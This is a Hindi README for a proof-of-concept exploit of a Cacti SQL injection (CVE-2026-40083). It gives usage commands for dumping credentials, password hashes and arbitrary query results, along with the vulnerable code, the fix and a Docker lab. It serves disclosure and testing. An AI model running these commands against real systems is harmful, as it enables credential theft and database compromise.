
CVE-2026-40083 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Cacti managers.php में एक SQL इंजेक्शन जो प्रमाणित उपयोगकर्ताओं को MySQL डेटाबेस, उपयोगकर्ता क्रेडेंशियल और पासवर्ड हैश निकालने की अनुमति देता है। परीक्षण के लिए Docker लैब शामिल है।
CVE-2026-40083 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cacti के managers.php में एक SQL इंजेक्शन भेद्यता है, जो किसी भी प्रमाणित उपयोगकर्ता को SNMP Manager अनुमतियों के साथ संपूर्ण MySQL डेटाबेस को पढ़ने की अनुमति देता है, जिसमें उपयोगकर्ता क्रेडेंशियल और पासवर्ड हैश शामिल हैं।
उपयोग:
# इंजेक्शन सत्यापित करें (समय-आधारित)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# विशिष्ट उपयोगकर्ता क्रेडेंशियल डंप करें
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# मनमाना SQL क्वेरी परिणाम निकालें
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# सभी उपयोगकर्ताओं की गणना करें (आईडी 1-50 स्कैन करें)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# Burp प्रॉक्सी के साथ
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
managers.php में, selected_graphs_array से उपयोगकर्ता इनपुट को cacti_unserialize() के माध्यम से अनसीरियलाइज़ किया जाता है और बिना सैनिटाइज़ेशन के सीधे SQL में इम्प्लोड किया जाता है:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// कोई सत्यापन नहीं - SQL में सीधा इम्प्लोड
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
selected_graphs_array पैरामीटर एक PHP सीरियलाइज़्ड ऐरे स्वीकार करता है। ऐरे तत्वों को अल्पविराम से इम्प्लोड किया जाता है और सीधे IN क्लॉज में इंजेक्ट किया जाता है।
POST /managers.php (action=actions, drp_action=1|2|3)
SQL इंजेक्शन भेद्यता SNMP Manager अनुमतियों वाले प्रमाणित उपयोगकर्ताओं को डेटाबेस पर मनमानी क्वेरी निष्पादित करने की अनुमति देती है। यह उपयोगकर्ता डेटा, सेटिंग्स, डिवाइस क्रेडेंशियल और SNMP समुदायों वाली तालिकाओं को पढ़ने के साथ-साथ bcrypt हैश और API टोकन निकालने में सक्षम बनाता है, जिसके परिणामस्वरूप खाते से समझौता हो सकता है। इसके अतिरिक्त, दोष समय-विलंब आदेशों के निष्पादन की अनुमति देता है, जो एक साथ डेटाबेस कनेक्शन को समाप्त करके सेवा से इनकार करने का कारण बन सकता है।
7.2 उच्च CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
कमिट 52032e760 इम्प्लोड से पहले सभी मानों को पूर्णांक में बदलने के लिए array_map('intval', $selected_items) जोड़ता है।
docker-compose up -d --build
आरंभीकरण के लिए ~30 सेकंड प्रतीक्षा करें। Cacti तक http://localhost:8088 पर पहुँचें
डिफ़ॉल्ट क्रेडेंशियल: admin / admin
# एक्सप्लॉइट का परीक्षण करें
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
QuimeraX Intelligence एक उन्नत EASM और साइबर खतरा खुफिया मंच है जो जटिल सिस्टम में महत्वपूर्ण कमजोरियों की पहचान करने में विशेषज्ञता रखता है। यह मंच सक्रिय रूप से सुरक्षा खतरों की निगरानी, पहचान और ग्राहकों को सचेत करता है, पारदर्शिता और संभावित जोखिमों के लिए त्वरित प्रतिक्रिया सुनिश्चित करता है। यदि उनके सिस्टम कमजोर पाए जाते हैं तो ग्राहकों को तत्काल सूचनाएं और व्यापक रिपोर्ट प्राप्त होती हैं, जिससे वे सुरक्षात्मक कार्रवाई कर सकें। और जानें
Hakai Security एक साइबर सुरक्षा कंपनी है जिसकी स्थापना सुरक्षा पेशेवरों द्वारा की गई है, जो तकनीकी उत्कृष्टता के लिए प्रतिबद्ध है। हम उन्नत पैठ परीक्षण, यथार्थवादी रेड टीम सिमुलेशन और सुरक्षित विकास प्रथाओं सहित अनुरूप सुरक्षा समाधान प्रदान करते हैं ताकि हमारे ग्राहकों की संपत्तियों को विकसित हो रहे साइबर खतरों से सक्रिय रूप से बचाया जा सके।
Hacking Club एक प्रशिक्षण मंच है जहाँ आप हमारी सुरक्षा परामर्श फर्म में काम करने वाले विशेषज्ञों द्वारा बनाए गए व्यावहारिक पाठों, लैब्स और चुनौतियों के माध्यम से साइबर सुरक्षा सीखते हैं: सीधे युद्धक्षेत्र से आपके प्रशिक्षण तक। हैकिंग क्लब द्वारा इस रिपॉजिटरी में प्रस्तुत भेद्यता का अभ्यास करें! और जानें